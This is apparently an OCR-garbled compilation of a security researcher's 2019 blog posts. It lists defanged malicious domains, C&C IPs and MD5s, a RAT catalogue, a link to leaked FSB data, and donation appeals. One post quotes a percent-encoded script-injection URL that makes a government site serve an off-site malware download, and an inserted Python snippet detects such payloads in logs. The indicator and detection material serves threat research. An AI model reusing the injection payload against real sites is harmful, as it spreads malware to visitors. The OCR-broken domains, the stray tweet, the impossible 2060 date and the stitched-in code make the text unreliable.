hxxp://treeki ndsearch.com 
hxxp://u nicsearch.com 
hxxp://uniqads.com 
hxxp://upg-soft.net 
hxxp://vitecmed ia.com 



hxxp://wewi I lfind.com 
hxxp://win.com 
hxxp://wi ndefender.com 
hxxp://workhomecentre.com 
hxxp://zappinads.com 
hxxp://wi ndefender.com 
hxxp://wontu-search.com 
hxxp://workhomecenter.com 
hxxp://you rseeker.com 
hxxp://you rshopz.com 
hxxp://you rteacheronline.com 
hxxp://zappi nads.com 
hxxp://zooworld-search.com 

Related domains known to have participated in the campaign:

hxxp://adtraff.com - 190.15.73.254
hxxp://forceup.com - 190.15.73.254
hxxp://burnads.com - 190.15.73.254
hxxp://blessedads.com - 190.15.73.254
hxxp://prevedmarketing.com - 190.15.73.254
hxxp://r2d2adverising.com - 190.15.73.254
hxxp://shivanetworking.com - 190.15.73.254

We'll post updates as soon as new developments take place.

Assessing the Recently Leaked FSB Contractor Data - A Peek Inside Russia's Understanding of Social Network Analysis and Tailored Access Operations (2019-08-02 15:20)

I've recently managed to obtain a copy of the recently leaked FSB contractor data courtesy of 0v1ru$ and "Digital Revolution" and I've decided to take a closer look, including an in-depth overview and discussion of the leaked data in the context of today's modern-driven AI-powered automated OSINT technologies in the broader context of the U.S Intelligence Community, in particular the utilization of rogue TOR exit nodes for the purpose of intercepting and harvesting TOR exit node data within the Russian Federation, including social-network analysis, data-mining and possible "lawful surveillance" and "lawful interception", including possible data collection type of Tailored Access Operation campaigns launched by "0day Technologies" and "SyTech".

Sample Company Logo:

Sample personal photos of the individuals behind "0day Technologies" and "SyTech":

Sample Screenshots of the User-Interface behind the "Lawful Surveillance" and "Lawful Interception":

Sample Screenshots of the Rogue and Bogus Tor-Exit-Node Research Project:

Sample URLs involved in the campaign:

hxxp://0day.ru

hxxp://sytech.ru

Sample Telegram account involved in the campaign:

hxxp://t.me/D1G1R3V - Digital Revolution

Sample Vkontakt account involved in the campaign:

hxxp://vk.com/d1g1r3v

Sample Twitter account involved in the campaign:

hxxp://twitter.com/d1g1r3v

hxxp://twitter.com/0v1ruS

Sample URL known to have participated in the campaign:

hxxp://d1g1r3v.net

Related URL of the currently leaked data: 

https://mega.nz/ #F!3cOITaLI!jVUS _O7Q0opCHUPYgKlE _w 
Cybertronics

gOt Bitcoin? (2019-08-19 12:51) 

Dear blog readers, dare to take a moment of your precious time to check a venerable and recently proposed cyber security project investment including the opportunity to enter a Bold New World of Hacking and Information Security? Has the time come to set them straight? Keep reading.

Check out this Onion - http://lkzihepprlhxtvbutjedoazbsqd4avmifhpjms3zuq7itceiu4qajwad.onion/ and donate today!

Stay tuned! 
DDanchev is for Hire! (2019-09-07 14:38)

Looking for a full time threat intelligence analyst, cybercrime researcher, or a security blogger?

Approach me at dancho.danchev@hush.com 
Historical OSINT - The Russian Business Network Says "Hi" (2019-09-09 15:27)

You know you're popular when "they" say "hi". 

It's 2009 and I've received a surprising personal email courtesy of guess who - The Russian Business Network showing off the actual ownership of the hxxp://rbnnetwork.com domain and basically saying "hi". It's worth pointing out that throughout 2008-2013 I've extensively profiled the activities including the customer activities of some of the most prolific customers and members of the infamous Russian Business Network also known as the RBN in the context of [1]blackhat SEO, [2]iFrame and [3]input validation abuse across major [4]Web properties including [5]malvertising and various other [6]malware-serving and [7]client-side exploits serving campaigns including [8]money mule recruitment and [9]phishing campaigns, the ubiquitous at the time [10]fake security software also known as scareware, in a variety of post series.

• Related post - [11]Dissecting a Sample Russian Business Network (RBN) Contract/Agreement Through the Prism of RBN's AbdAllah Franchise

It's been a decade since I last profiled the most prolific and sophisticated market-leading bullet-proof hosting cybercrime enterprise - the Russian Business Network which at the time was dominating the majority of campaigns that I was busy profiling with the help of fellow researchers to whom I owe a big deal of thanks for approaching me circa 2008-2013 namely [12]Jart Armin and [13]James McQuaid with whom I've been directly or indirectly keeping in touch throughout 2008-2013 for the purpose of offering quality research on the activities of the Russian Business Network including their customers and fraudulent and malicious campaigns.

• Related post - [14]Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Multiple International Embassies

Stay tuned and thanks for reaching out! 

Related Russian Business Network (RBN) Research: 

[15] I See Alive IFRAMEs Everywhere - Part Two

[16] I See Alive IFRAMEs Everywhere

[17] Bank of India Serving Malware 

[18] U.S Consulate in St.Petersburg Serving Malware 

[19] Syrian Embassy in London Serving Malware 

[20] CISRT Serving Malware 

[21] Compromised Sites Serving Malware and Spam 

[22] U.S Consulate St. Petersburg Serving Malware 

[23] Massive RealPlayer Exploit Embedded Attack 

[24] Malware Serving Exploits Embedded Sites as Usual 

[25] MDAC ActiveX Code Execution Exploit Still in the Wild 

[26] Yet Another Massive Embedded Malware Attack 

[27] Embedding Malicious IFRAMEs Through Stolen FTP Accounts

[28] Over 100 Malwares Hosted on a Single RBN IP


[29] Detecting and Blocking the Russian Business Network 

[30] Exposing the Russian Business Network 

[31] Go to Sleep, Go to Sleep my Little RBN 

[32] Injecting IFRAMEs by Abusing Input Validation

[33] RBN's Fake Account Suspended Notices 

[34] ZDNet Asia and Torrent Reactor IFRAME-ed 

[35] Russia's FSB vs Cybercrime 

[36] HACKED BY THE RBN! 

[37] Rogue RBN Software Pushed Through Blackhat SEO 

[38] Wired.com and History.com Getting RBN-ed 

[39] The Russian Business Network 

[40] Exposing the Russian Business Network 

[41] More CNET Sites Under IFRAME Attack 

[42] Embedded Malware at Bloggies Awards Site 

[43] Have Your Malware In a Timely Fashion 

[44] Geolocating Malicious ISPs 

[45] More High Profile Sites IFRAME Injected 

[46] The New Media Malware Gang - Part Four 

[47] Another Massive Embedded Malware Attack 



1. https://ddanchev.blogspot.com/search/label/Blackhat%20SE
Join Me on Patreon Community! (2019-09-09 18:07)

Dear blog readers,

I decided to let everyone know that I've recently launched my own [1]Patreon Community Page with the idea to let everyone know that I'm currently busy crowd-funding a high-profile upcoming Cyber Security Investment Project - and I would love to hear from you more details about your thoughts regarding new Tier Features and whether or not you could make a possible long-term type of financial donation or sponsorship regarding my research and my security expertise.

The current status of the project:

- I'm currently busy soliciting additional input from colleagues regarding upcoming Tier Features

- I'm currently busy reaching out to colleagues to possibly convert them to Patreon Sponsors

- I'm currently busy working on a high-profile Security Podcast

- I'm currently busy working on a high-profile Security Newsletter

Has my research helped you or your organization in the past? Have you been a long-time blog reader? Have you learned something new? Did my active cybercrime and nation-state actor profiling help you excel in your career path? Are you happy with what you're seeing? Dare to take a moment and refer a colleague or an organization my personal blog including my [2]Patreon Community Page including a possible Patreon Sponsor request confirmation?

Looking forward to hearing from you at - dancho.danchev@hush.com

Enjoy! 

1. https://www.patreon.com/bePatron?u=15880233

2. https://www.patreon.com/ddanchev123
Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild (2019-09-11 16:53)

I've recently come across a rogue NordVPN web site distributing malicious software, potentially exposing NordVPN users to a multitude of malicious software and further compromising the confidentiality, availability and integrity of the targeted host.

In this post, I'll provide actionable intelligence on the infrastructure behind the campaign and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://nord-vpn.club - 192.64.119.159; 2.56.215.159

Sample malicious MD5s known to have participated in 
the campaign: 

Hilary kneber @hilarykneber • 16 Jan 2011

d DANCHO DANCHEV Does anyone know ..Is there a way I can determine the exact date that Dancho Danchev began to "unfollow" me?
Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet (2019-09-11 19:07)

It's 2010 and I've recently come across compromised official Web sites of the Georgian Government's Ministry of Defense and Ministry of Justice, potentially participating in a wide-spread phishing and malware-serving campaign enticing users into interacting with rogue U.S Intelligence and U.S Law Enforcement themed emails for the purpose of spreading and dropping malicious software on the targeted host's PC.

Sample malicious URL known to have participated in the campaign abusing common Web Site redirection application vulnerability flaw:

hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121
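
The sample URL above carries percent-encoded markup and an off-site download link inside a query parameter of a legitimate site's script. As an added example (not code from the original post), the following Python shows one way a defender could flag such requests in web server logs; the request targets, the example.org/example.net hosts and the `OWN_DOMAINS` allow-list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Domains the site legitimately links to (assumption for this example).
OWN_DOMAINS = ("example.org",)

# Constructed request targets, as they would appear in an access log.
# The second mirrors the shape of the URL in the post: an encoded
# anchor/script fragment pointing at an off-site .zip inside a parameter.
SAMPLE_TARGETS = [
    "/2007/video/movie.php?l=G&v=intro.flv",
    "/2007/video/movie.php?l=G&v=%20%3E%3Ca%20href%3Dhttp%3A%2F%2F"
    "download.example.net%2Fwp-admin%2Freport.zip%3EDownload%3C%2Fa%3E"
    "%3Cscript%3Ewindow.open(%27http%3A%2F%2Fdownload.example.net"
    "%2Fwp-admin%2Freport.zip%27)%3C%2Fscript%3E",
    "/search.php?q=how+to+use+%3Cb%3E+tags",
    "/out.php?next=http%3A%2F%2Fwww.example.org%2Fnews%2F",
    # Double-encoded off-site URL: one decoding pass would miss it.
    "/out.php?next=http%253A%252F%252Fcdn.example.net%252Fa.zip",
]

# Tags commonly reflected into pages, plus a bare "href" token.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(?:script|a|iframe|object|embed|img)\b|\bhref\b", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_own(host, own_domains=OWN_DOMAINS):
    """True if host is one of our domains or a subdomain of one."""
    host = host.lower().strip(".")
    return any(host == d or host.endswith("." + d) for d in own_domains)


def inspect_target(target, own_domains=OWN_DOMAINS):
    """Return one finding per query parameter carrying markup or an off-site URL."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        clear = fully_unquote(value)
        markup = bool(MARKUP_RE.search(clear))
        offsite = sorted({h.lower() for h in URL_RE.findall(clear)
                          if not is_own(h, own_domains)})
        if markup or offsite:
            findings.append(
                {"param": name, "markup": markup, "offsite_hosts": offsite})
    return findings


def verdict(target, own_domains=OWN_DOMAINS):
    """'high' = markup and off-site URL in one parameter; 'review' = either one."""
    findings = inspect_target(target, own_domains)
    if any(f["markup"] and f["offsite_hosts"] for f in findings):
        return "high"
    return "review" if findings else "clean"


if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        print(verdict(t), inspect_target(t))
```
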
Related malicious URLs known to have participated in the campaign:

hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:

hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:

hxxp://new.justice.gov.ge/files/Headers/in.txt

hxxp://new.justice.gov.ge/files/Headers/fresh.txt

hxxp://new.justice.gov.ge/files/Headers/rollersl.php

Related MD5s known to have participated in the 
campaign: 


Known to have participated in the campaign are also the following two domains part of the Hilary Kneber botnet:

hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com 
hxxp://dhsorg.org - Email: hilarykneber@yahoo.com 



Related malicious download location URLs known to 
have participated in the campaign: 


Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://dhsinfo.info - 218.240.28.34

hxxp://greylogic.info - 218.240.28.34; 218.240.28.4

hxxp://intelfusion.info - 218.240.28.34

hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:

MD5: 8b3a3c4386e4d59c6665762f53e6ec8e
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5
MD5: 28c4648f05f46a3ec37d664cee0d84a8



Once executed a sample malware phones back to the following C&C server IPs:

hxxp://from-us-with-love.info - 91.216.141.171 

hxxp://from-us-with-love.info/i mg I ov/zmpt4d/n 16vl8.bin 

hxxp://vittles.mobi - 174.132.255.10 

hxxp://nicupdate.com - 85.31.97.194 

Related malicious and fraudulent IPs known to have 
participated in the Hilary Kneber botnet campaign: 


Related malicious and fraudulent domains known to 
have participated in the Hilary Kneber botnet 
campaign: 


Related Hilary Kneber botnet posts: 

[1] Keeping Money Mule Recruiters on a Short Leash 

[2] Standardizing the Money Mule Recruitment Process 

[3] Dissecting the Exploits/Scareware Serving Twitter Spam 
Campaign 

[4] Koobface Botnet Starts Serving Client-Side Exploits 

1. https://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

2. https://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. https://ddanchev.blogspot.com/2010/06/dissecting-exploitsscareware-serving.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
I'm Back! (2019-09-17 09:56)

Dear blog readers - it's been a while since I've last posted a quality update following my [1]disappearance and possible kidnapping attempt circa 2010 but as many of you have noticed I've recently published a variety of research and CYBERINT type of articles in a variety of areas which means that I'll be shortly returning to the usual blogging rhythm successfully publishing a quality set of research articles anytime soon. I've also wanted to let you know that I've recently launched an extremely popular News Portal called [2]Unit-123 offering practical advice to the U.S Intelligence Community including Cyber Warriors and Cyber Warfare experts including a Cyber Security and Hacking Community called [3]Offensive Warfare including a Bitcoin soliciting bid on the Dark Web for the upcoming launch of a proprietary custom-based Virtual Reality Social Network for Hackers and Security Experts called [4]Cybertronics (dzxvmqrl3rjxbzuer6vv5ejahniz2nefqxfmwspfmvzjo4xxzm7n4xad.onion) including the usual interview spree in an attempt to land a permanent job position as I've been working on a variety of personal and proprietary Security and OSINT projects.
• Are you interested in having me speak at your event? Are you interested in inviting me to join a classified and potentially sensitive event or research group? Are you interested in becoming a writer at this blog? Are you interested in advertising at this blog? Feel free to approach me - disruptive.individuals@gmail.com

Consider going through some of my most recently published research:

• [5]Exposing Iran's Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis

• [6]Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infastructure

• [7]Flashpoint Intel Official Web Site Serving Malware - An Analysis

• [8]Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer"

• [9]Historical OSINT - A Peek Inside The Georgia Government's Web Site Compromise Malware Serving Campaign - 2010

• [10]Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

• [11]Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [12]Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [13]Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfolio Spotted in the Wild

• [14]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community

• [15]Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis

• [16]Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet

• [17]Historical OSINT - The Russian Business Network Says "Hi"

• [18]Profiling "Innovative Marketing" - The Flagship Malvertising and Scareware Distributor - Circa 2008 - An OSINT Analysis

• [19]Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT Analysis

• [20]Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts

In this post I'll walk you through the story of my disappearance including a brief introduction and explanation of my "hacker enthusiast" years circa the 90's where I've been busy doing "lawful surveillance" and "lawful interception" throughout my teenage years while I was not busy working full-time with several H/C/P/A (Hacking/Cracking/Phreaking/Anarchy) groups as a full-time member practically setting up the foundations of the Threat Intelligence market segment a few years later including the basics of Technical Collection type of position including Independent Contractor working under NDA in a post 9/11 World including a personal greeting to everyone who's been approaching me and reaching out offering support and technical and operational "know-how" including general "say hi" advice.
I want to express a personal gratitude to a good old research friend - [21]Internet Anthropologist - who actually [22]initiated a track-down action and managed to indirectly find me circa 2010 with the help of international and Bulgarian law-enforcement including fellow colleagues and friends from the Security Industry and U.S Intelligence Community circa 2008-2013 who attempted to track me down and find out more about my disappearance.

In this post I'll discuss my visit to the GCHQ circa 2008 with the Honeynet Project including an in-depth discussion on my "lawful interception" and "lawful surveillance" experience circa the 90's throughout my teenage hacker years including an in-depth discussion on the hacking Scene that I was proud to be a member of throughout the 90's having successfully participated in a variety of community and commercial projects including a personal thanks to the following friends and colleagues for offering support and keeping track of my research:

• [23]Jamie Riden for making a personal contribution to my PayPal account for research purposes

• [24]Steve Santorelli from Team Cymru for expressing interest in a proprietary Threats Database

• [25]Michal Salat for participating in a brief trial of my Threat Data service

• [26]Ian Cook for making a personal introduction to my current part-time employer [27]KCS Group Europe

• [28]Jeffrey Bardin from Treadstone71 who reached out and offered employment opportunity

• [29]Harrison Cook who's been persistently donating and reaching out to support the Offensive Warfare 2.0 community

• [30]John Young from Cryptome.org who helped spread the word about the Offensive Warfare 2.0 Community

• [31]Liran Sorani from Webhose for the opportunity to participate in a part-time project
An In-depth Analysis of the Hacking Scene circa the 90's through the prism of Dancho Danchev also known as tHe mAniAc:
In a World where we've successfully set the foundation of offensive clandestine and psychological operations including the foundations of Technical Collection and the foundations of the [32]Threat Intelligence market segment including the persistent emphasis on cyber threats facing U.S Government and U.S National Infrastructure in the context of enriching and disseminating actionable Threat Intelligence on a variety of U.S Intelligence Community including academic partners throughout the past decade successfully leading me to participate in a Top Secret GCHQ Surveillance and Monitoring Program basically keeping track of hackers and security researchers on Twitter for proactive Cyber Defense and OSINT purposes called "[33]Lovely Horse" including a possible "4th Party Collection" trend-setting initiative circa 2008-2013 labeling some of my research as a possible "4th Party Collection" partner of U.S Intelligence Community including the [34]tracking and take down of the Koobface botnet including my experience as a Managing Director of "The Underground" also known as [35]Astalavista Security Group's Astalavista.com ([36]Security Interviews - Part 01; [37]Security Interviews - Part 02; [38]Security Interviews - Part 03) throughout 2003-2006 with my ex-girlfriend now partner in life - Yordanka Ilieva - when we used to rock the boat - and are prone to do so. Takes you back doesn't it? Keep reading.

Personal Photo of bedroom hacker - today's leading expert in the field of cybercrime research security blogging and threat intelligence gathering - Dancho Danchev also known as tHe mAniAc circa the 90's with his hacker girlfriend - Yordanka Ilieva - including various personal projects circa the 90's
-={ Blackcode Ravers Magazine issue 2 }=-
Home page: http://www.blackcode.com
Editor of the magazine: tHe mAniAc
themaniac@blackcode.com

Table of contents:

1. Editorial
2. Mirrors of the magazine
3. Latest News with Blackcode Ravers
4. How to break your school security
5. About virii
6. Advertising
7. Trojans section
8. For the newbies
9. Linux section
10. Interviews
11. Final words

1. Editorial

It's me again. This is our second issue. I've changed the design and I've added several new things in the newsletter.
I've also received a lot of e-mails about our magazine.
People like it and they want more information here.
The first issue was short one but of course every new issue has many new things added in it.
I'm happy people like it and we have MANY new subscribers every day.
Also we have much more visitors than before.
The Complete Trojans Text (Security Related)
by tHe MaNiAc
written on: I.04.2060
contact me at: themaniac@blackcode.com
maniac@forbidden.net-security.org

This guide is for educational purposes only I do not take any responsibility about anything happen after reading the guide. I'm only telling you how to do this not to do it. It's your decision.

If you want to put this text on your Site/FTP/Newsgroup or anything else you can do it but don't change anything without the permission of the author. I'll be happy to see this text on other pages too.

All copyrights reserved. You may distribute this text as long as it's not changed.

Author Notes:

I hope you like my texts and find them useful.

If you have any problem or some suggestion feel free to e-mail me but please don't send mails like "I want to hack the US government please help me" or "Tell me how to bind a trojan into a .jpg" "Where can I get a portscanner" etc.

Be sure if I can help you with something I will do it.

I've started writing security related tutorials and I hope you like that. I'll try to cover much more topics in my future texts and I want to thank to all of the people that like my texts.

Links:

Here you can find other texts written by me or other friends:
http://www.blackcode.com
blacksun.box.sk
neworder.box.sk
1. What Is This Text About?
2. What Is A Trojan Horse
3. Trojans Today
4. The future of the trojans
5. Anti-Virus Scanners
6. How You Can Get Infected?
   - From ICQ
   - From IRC
   - From Attachment
   - From Physical Access
   - From Trick
7. How Dangerous A Trojan Can Be?
8. Different Kinds Of Trojans
   - Remote Access Trojans
   - Password Sending Trojans
   - Keyloggers
   - Destructive Trojans
   - FTP Trojans
9. Who Can Infect You?
• I happen to have directly established a connection with one of the primary Sub7 Trojan Horse authors HeLLfiReZ which makes me pretty close to [39]Steve Gibson in one way or another - throughout the 90's where we exchanged Trojan Horse samples while I was busy working for Trojan Defense Suite and the infamous Lockdown2000 anti-trojan software suite where I was busy working on signatures and help-guides compilation while I was also busy being a member of several hacking groups primarily found on the Cyberarmy.com Top 50 Hacking List including Progenic.com Top 100 hacking sites list.

• Mail-bombing was a trend - in particular my personal experience of making jokes with friends who were unable to take care of 100+ email messages in their Inbox

• Mass-Mailing List subscription - in particular the fact that my friends were not capable of finding a productive way to get rid of the messages and unsubscribe themselves

• Telephony Denial of Service attack circa the 90's exploiting a popular for Eastern Europe Mail2SMS mobile provider feature - in particular the fact that it's not necessarily a pleasant experience to get rid of 100+ SMS messages received in a short-period of time

• "Lawful Interception" of friends - something else that I'm not particularly proud of is my "lawful surveillance" and "lawful interception" experience and capabilities of people that I knew and that I used to know largely driven by the need to explore and learn more
• Corporate Experience in the field of anti-trojan detection technologies and categorization - in particular my experience in creating trojan horse signatures and writing actual technical descriptions for the purpose of improving my employer's overall detection rate for a variety of trojan horse vendors circa the 90's.

Do you remember my work from the 90's? Are you familiar with the Scene circa the 90's? Feel free to approach me - disruptive.individuals@gmail.com or make a PayPal donation using my PayPal ID: dancho.danchev@hush.com for the purpose of fueling growth into my research.
Massive Portfolio of APT (Advanced Persistent Threat) and RAT (Remote Access Tools) Domains Spotted in the Wild - An Analysis (2019-09-20 17:17)

In a world dominated by thousands of currently active APT (Advanced Persistent Threat) campaigns also known as Remote Access Tools (RATs) including trojan horses it's worth pointing out that novice cybercriminals continue relying on and actively utilizing a variety of commercial and publicly obtainable DIY (do-it-yourself) Remote Access Tools (RATs) for the purpose of committing cyber espionage and launching malicious and fraudulent cyber espionage themed campaigns targeting thousands of users including companies and nation-state actors.

In this post I'll provide actionable intelligence on some of the most popular RAT (Remote Access Tools) currently utilized for APT (Advanced Persistent Threat) type of nation-state sponsored and tolerated cyber espionage themed campaigns including an in-depth discussion on a massive domain portfolio of currently active C&C server IPs known to have participated in a variety of APT (Advanced Persistent Threat) type of cyber espionage campaigns throughout 2015-2019.

Among the most popular APT (Advanced Persistent Threat) and Remote Access Tools (RATs) releases based on my public and proprietary sensor network remain the following currently obtainable commercial and publicly obtainable tools:

• Casa RAT

• Bandook RAT

• Dark Comet Rat

• Cerberus

• Cybergate

• Blackshades

• Poison Ivy

• Schwarze Sonne RAT

• Syndrome RAT

• Team Viewer

• Y3k RAT

• Snoopy

• 5p00f3r.N$ RAT

• SpyNet

• P. Storrie RAT

• Turkojan Gold

• Bifrost

• Beast

• Shark

• Pain RAT

• xHacker Pro RAT

• Seed RAT

• Optix Pro RAT

• Dark Moon

• NetDevil

• Deeper RAT

• MiniMo RAT

• Alusinus RAT v0.8

• Babylon 1.6.0.0

• Bozok 1.4.3

• BX RAT v1.0

• Cloud Net RAT

• Comet RAT v0.1.4

• Coringa-RAT v0.1

• Crimson 3.0.0

• Crimson RAT 2.2.6

• ctOs 1.3.0.0

• CyberGate v1.01.12

• Dark Comet 5.3

• DarkComet Legacy

• DH Rat 0.3

• D-RAT

• Frutas RAT v0.9

• Greame RAT v1.9

• HAKOPS RAT v2

• Imminent Monitor 3.9.0.0

• Imperium RAT Cracked

• jRat

• jSpy

• jSpy RAT v0.09

• KilerRat V 10.0.0

• L6-RAT Beta

• Maus 2.0b

• Mega RAT 1.5 Beta

• MLRAT

• MQ5 RAT

• NanoCore 1.2.2.0

• NingaliNET v1.1.0.0

• NjRAT 0.7

• njRAT v0.8d By Nasser2012

• njworm

• NovaLite v3.0

• Nuclear RAT 2.1.0

• Orion RAT 0.9 Free

• Pandora RAT V1.1

• Paradox RAT

• Proton 1.1.0.6

• pupy-master

• Poison Ivy

• Quasar 1.1 + Source

• QuasarRAT v1.3.0.0

• Rabbit-Hole Autoit RAT v1.0 Beta 2

• Revenge RAT v0.1

• SkyWyder 2.2

• Spycronic 1.02.1

• Spygate 2.6

• SpyGate-RAT 3.3

• SpyNet 0.7 Public

• Spy-Net v2.6

• Turkojan 4.0 Gold

• ucuL v1.1

• Vantom RAT

• Virus Rat v8.0 Beta

• Xena Rat 2.0

• xRAT 2.0

Related domains and IPs known to have participated in various APT (Advanced Persistent Threat) and Remote Access Tools (RATs) type of malicious and fraudulent campaigns throughout 2015-2019:

hxxp://mahd ibabal23.ddns.net/ 
hxxp://majedl 11 lll.myq-see.com/ 
hxxp://maj od98m.ddns.net/ 
hxxp ://makarand. no-ip.org/ 
hxxp://mal akatef09.ddns.net/ 
hxxp ://mamal 9921.ddns.net/ 
hxxp ://mami 52 55.duckdns.org/ 
hxxp ://mar020one. hopto.org/ 
hxxp ://marcsil.ddns.net/ 
hxxp ://marknetz. hopto.org/ 
hxxp ://marocma roc. hopto.org/ 
hxxp://marti nl23456.no-ip.org/ 
hxxp://masafat.ddns.net/ 
hxxp ://maskaral ama.ddns.net/ 
hxxp ://masterat. myftp.org/ 
hxxp ://matg io.duckdns.org/ 
hxxp://matrix-teste.ddns.net/ 



hxxp://mayya ha. no-ip. info/ 
hxxp://mazenttr2. hopto.org/ 
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hxxp://me512.zapto.org/ 
hxxp://medoah med3.ddns.net/ 
hxxp://medx321.ddns.net/ 
hxxp://mee2008.zapto.org/ 
hxxp://mehost.ddns.net/ 
hxxp://mehtabl 2 3.ddns.net/ 
hxxp://memeai men 10. hopto.org/ 
hxxp://memexmama.ddns.net/ 
hxxp://mhoa mmedtty.hopto.org/ 
hxxp://mht3.ddns.net/ 
hxxp://microsoft-office.ddns.net/ 
hxxp://mido28. hopto.org/ 
hxxp://migo2018.zapto.org/ 
hxxp://mi kaniki.ddns.net/ 
hxxp://mikestar. no-ip. biz/ 
hxxp://mi ltin2.no-ip.org/ 
hxxp://mi nou555.hopto.org/ 



hxxp://misterx94.ddns.net/ 
hxxp://misty2 55. no-ip.org/ 
hxxp://mixtape2016. ddns.net/ 
hxxp://mmdjj212.myftp.biz/ 
hxxp://mobd ro.hopto.org/ 
hxxp://mobi Ies0ft.no-ip.org/ 
hxxp://moga hed.ddns.net/ 
hxxp://moha medll.ddns.net/ 
hxxp://moha med4dz.ddns.net/ 
hxxp://moha medamine.ddns.net/ 
hxxp://moha medhg.no-ip.org/ 
hxxp://mohamednj rati 11. no-ip. biz/ 
hxxp://mohammad 2002. no-ip. biz/ 
hxxp://moha mmadhk.ddns.net/ 
hxxp://mohammed 2 2468. no-ip. biz/ 
hxxp://moha mmed93mahdi.ddns.net/ 
hxxp://mohfort.ddns.net/ 
hxxp://mohmad.myftp.biz/ 
hxxp://moh mdnor.ddns.net/ 
hxxp://mohsanal i79355.ddns.net/ 



hxxp://mohsenfaz.ddns.net/ 
hxxp://moj il936.ddns.net/ 
hxxp://mokhter2 2 2 029.ddns.net/ 
hxxp://moktarpicaasri nabil.zapto.org/ 
hxxp://momen-swesi. no-ip. biz/ 
hxxp://momo2015.duckdns.org/ 
hxxp://mon itoring007.zapto.org/ 
hxxp://moonmarlO. no-ip. biz/ 
hxxp://moosio. no-ip. biz/ 
hxxp://mosey book.com/ 
hxxp://mosli rn.ddns.net/ 
hxxp://mostafaafrotoO.ddns.net/ 
hxxp://motoshi.zapto.org/ 
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hxxp://mphp.hopto.org/ 
hxxp://mrbl acklife.ddns.net/ 
hxxp://mrclone97.ddns.net/ 
hxxp://mrg net.ddns.net/ 
hxxp://mrkri per3331.zapto.org/ 
hxxp://mrm2.ddns.net/ 



hxxp://mrreda98. ddns.net/ 
hxxp://msficecream. ddns.net/ 
hxxp://msn-web.ddnsking.com/ 
hxxp://msn79.ddns.net/ 
hxxp://mstar.ddns.net/ 
hxxp://mstfa 10.ddns.net/ 
hxxp://mu rryapplicazione.no-ip.org/ 
hxxp://muxa mi lu.hopto.org/ 
hxxp://mwanika. no-ip. biz/ 
hxxp://myaw. no-ip. biz/ 
hxxp://myfreerat.ddns.net/ 
hxxp://myfren id 2x.zapto.org/ 
hxxp://myhostl23.myftp.biz/ 
hxxp://myi 11 usion02.hopto.org/ 
hxxp://myon line, no-ip. biz/ 
hxxp://mypy23.ddns.net/ 
hxxp://nad ineemma.servegame.com/ 
hxxp://nama ndroidk63.zapto.org/ 
hxxp ://napaixonado.ddns.net/ 
hxxp://nassahsl iman.ddns.net/ 



hxxp://nemesi s2017.zapto.org/ 
hxxp://netfl ix-ip.hopto.org/ 
hxxp://new77 7.ddns.net/ 
hxxp://newword. serveblog.net/ 
hxxp://newxor2. no-ip.org/ 
hxxp://n injabird29.myvnc.com/ 
hxxp://n irajpawarl997.ddns.net/ 
hxxp://njesra.ddns.net/ 
hxxp://nododg.ddns.net/ 
hxxp://nohacker.ddns.net/ 
hxxp://noi phackk.ddns.net/ 
hxxp://noi pjajaja.ddns.net/ 
hxxp://nowg irlas.ddns.net/ 
hxxp://noxrr.ddns.net/ 
hxxp://nu I ldoesnotexist.duckdns.org/ 
hxxp://oday 1995. zapto.org/ 
hxxp://oko.gotdns.ch/ 
hxxp://omar. no-ip. biz/ 
hxxp://oneriakosa.ddns.net/ 
hxxp://opt9 l.ddns.net/ 



hxxp://ori hacker.ddns.net/ 
hxxp://osa marizk.ddns.net/ 
hxxp://osmsalem.ddns.net/ 
hxxp://ospr.pu blicvm.com/ 
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hxxp://oussama 1997.ddns.net/ 
hxxp://oussamadj 1997.ddns.net/ 
hxxp://ovi rus.ddns.net/ 
hxxp://owsen.ddns.net/ 
hxxp://paaradowx. hopto.org/ 
